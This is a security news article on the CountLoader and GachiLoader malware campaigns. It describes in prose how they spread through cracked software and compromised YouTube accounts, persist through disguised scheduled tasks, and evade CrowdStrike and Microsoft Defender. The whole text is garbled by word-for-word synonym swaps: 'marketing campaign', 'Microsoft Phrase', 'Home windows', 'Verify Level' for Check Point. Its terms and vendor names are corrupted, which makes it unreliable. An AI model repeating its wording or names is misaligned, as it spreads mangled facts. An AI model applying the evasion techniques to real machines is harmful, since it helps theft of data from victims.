Cybersecurity researchers have disclosed particulars of a brand new marketing campaign that has used cracked software program distribution websites as a distribution vector for a brand new model of a modular and stealthy loader often called CountLoader.
The marketing campaign “makes use of CountLoader because the preliminary device in a multistage assault for entry, evasion, and supply of extra malware households,” Cyderes Howler Cell Risk Intelligence workforce stated in an evaluation.
CountLoader was beforehand documented by each Fortinet and Silent Push, detailing the loader’s capability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected within the wild since not less than June 2025.
The newest assault chain begins when unsuspecting customers try to obtain cracked variations of authentic software program like Microsoft Phrase, which causes them to be redirected to a MediaFire hyperlink internet hosting a malicious ZIP archive, which comprises an encrypted ZIP file and a Microsoft Phrase doc with the password to open the second archive.
Current inside the ZIP file is a renamed authentic Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a distant server utilizing “mshta.exe.”
To determine persistence, the malware creates a scheduled activity that mimics Google through the use of the title “GoogleTaskSystem136.0.7023.12” together with an identifier-like string. It is configured to run each half-hour for 10 years by invoking “mshta.exe” with a fallback area.
It additionally checks if CrowdStrike’s Falcon safety device is put in on the host by querying the antivirus listing by way of Home windows Administration Instrumentation (WMI). If the service is detected, the persistence command is tweaked to “cmd.exe /c begin /b mshta.exe .” In any other case, it immediately reaches out to the URL utilizing “mshta.exe.”
CountLoader is supplied to profile the compromised host and fetch the next-stage payload. The most recent model of the malware provides capabilities to propagate by way of detachable USB drives and execute the malware immediately in reminiscence by way of “mshta.exe” or PowerShell. The entire listing of supported options is as follows-
Obtain an executable from a offered URL and execute it
Obtain a ZIP archive from a offered URL and executes both a Python-based module or an EXE file current inside it
Obtain a DLL from a offered URL and run it by way of “rundll32.exe”
Obtain an MSI installer package deal and set up it
Take away a scheduled activity utilized by the loader
Accumulate and exfiltrate intensive system info
Unfold by way of detachable media by creating malicious shortcuts (LNK) subsequent to their hidden authentic counterparts that, when launched, execute the unique file and run the malware by way of “mshta.exe” with a C2 parameter
Straight launch “mshta.exe” in opposition to a offered URL
Execute a distant PowerShell payload in reminiscence
Within the assault chain noticed by Cyderes, the ultimate payload deployed by the CountLoader is an info stealer often called ACR Stealer, which is supplied to reap delicate information from contaminated hosts.
“This marketing campaign highlights CountLoader’s ongoing evolution and elevated sophistication, reinforcing the necessity for proactive detection and layered protection methods,” Cyderes stated. “Its capability to ship ACR Stealer by a multi-stage course of ranging from Python library tampering to in-memory shellcode unpacking highlights a rising development of signed binary abuse and fileless execution ways.”
YouTube Ghost Community Delivers GachiLoader
The disclosure comes as Verify Level disclosed particulars of a brand new, closely obfuscated JavaScript malware loader dubbed GachiLoader that is written in Node.js. The malware is distributed by way of the YouTube Ghost Community, a community of compromised YouTube accounts that have interaction in malware distribution.
“One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel approach for Moveable Executable (PE) injection,” safety researchers Sven Rath and Jaromír Hořejší stated. “This method hundreds a authentic DLL and abuses Vectored Exception Dealing with to exchange it on-the-fly with a malicious payload.”
As many as 100 YouTube movies have been flagged as a part of the marketing campaign, amassing roughly 220.000 views. These movies have been uploaded from 39 compromised accounts, with the primary video relationship again to December 22, 2024. A majority of those movies have since been taken down by Google.
In not less than one case, GachiLoader has served as a conduit for the Rhadamanthys info stealer malware. Like different loaders, GachiLoader is used to deploy extra payloads to an contaminated machine, whereas concurrently performing a collection of anti-analysis checks to fly underneath the radar.
It additionally checks if it is working in an elevated context by working the “internet session” command. Within the occasion the execution fails, it makes an attempt to begin itself with admin privileges, which, in flip, triggers a Consumer Account Management (UAC) immediate. There are excessive possibilities that the sufferer will enable it to proceed, because the malware is prone to be distributed by pretend installers for fashionable software program, as outlined within the case of CountLoader.
Within the final part, the malware makes an attempt to kill “SecHealthUI.exe,” a course of related to Microsoft Defender, and configures Defender exclusions to keep away from the safety resolution from flagging malicious payloads staged in sure folders (e.g., C:Customers, C:ProgramData, and C:Home windows).
GachiLoader then proceeds to both immediately fetch the ultimate payload from a distant URL or make use of one other loader named “kidkadi.node,” which then hundreds the primary malware by abusing Vectored Exception Dealing with.
“The risk actor behind GachiLoader demonstrated proficiency with Home windows internals, developing with a brand new variation of a identified approach,” Verify Level stated. “This highlights the necessity for safety researchers to remain up-to-date with malware strategies similar to PE injections and to proactively search for new methods during which malware authors attempt to evade detection.”
